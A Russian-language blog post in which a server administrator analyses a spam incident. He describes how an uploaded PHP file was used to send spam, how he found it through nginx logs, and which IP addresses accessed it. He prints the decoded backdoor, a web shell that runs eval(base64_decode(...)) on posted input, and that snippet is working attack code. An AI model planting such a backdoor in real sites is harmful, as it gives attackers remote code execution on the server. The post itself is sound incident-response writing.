Petya Kohts - April 5th, 2013 [entries|archive|friends|userinfo]
Petya Kohts

[ userinfo | ljr userinfo ]
[ archive | journal archive ]

Links
[Links:| Fast Slow ljr_fif tango ]

April 5th, 2013

cb6f82f3e4007bdaccf419abafab94c8 [Apr. 5th, 2013|08:51 pm]
[Tags|, ]
[Current Mood |working]
[Current Music |Hybrid Leisureland - Division and composition]

Очередной раз наспамили с одного из моих серверов.

Конструкция практически такая же, как в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}
Далее через этот файл несколько раз послали спама
на пару десятков тысяч адресов.

Обнаружил дырку spamcop.net, который пожаловался провайдеру,
а тот уже переслал нам. Обнаружил конкретный файл путем просмотра
error_log проскирующего nginx за время, когда в очереди исходящих писем
появилось первое задержанное письмо. Нашлась такая строка:

2013/03/01 16:05:14 [error] 3713#0: *19382 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 201.182.92.138, server: www.joomla.dev.DOMAIN.ru, reques
t: "POST /.e523.php HTTP/1.1", upstream: "http://127.0.0.159:80/.e523.php", host: "www.joomla.dev.DOMAIN.ru"

Имя файла показалось подозрительным, дальше все раскрутилось легко.

Обращения к вредоносному файлу делались со следующих ip адресов:
1) 201.182.92.138 (Панама)
2) 31.184.244.18 (Объединенные Арабские Эмираты)

Материалы:
1) .e523.php
2) листинг очереди sendmail
3) примеры писем из очереди: [1], [2], [3], [4], [5]
4) access_log веб-сервера

Единственный текст, похожий на идентификатор системы,
это закомментированный текст cb6f82f3e4007bdaccf419abafab94c8
в начале программы. Что означает, непонятно. Тридцать два
шестнадцатиричных символа.
LinkLeave a comment

navigation
[ viewing | April 5th, 2013 ]
[ go | Previous Day|Next Day ]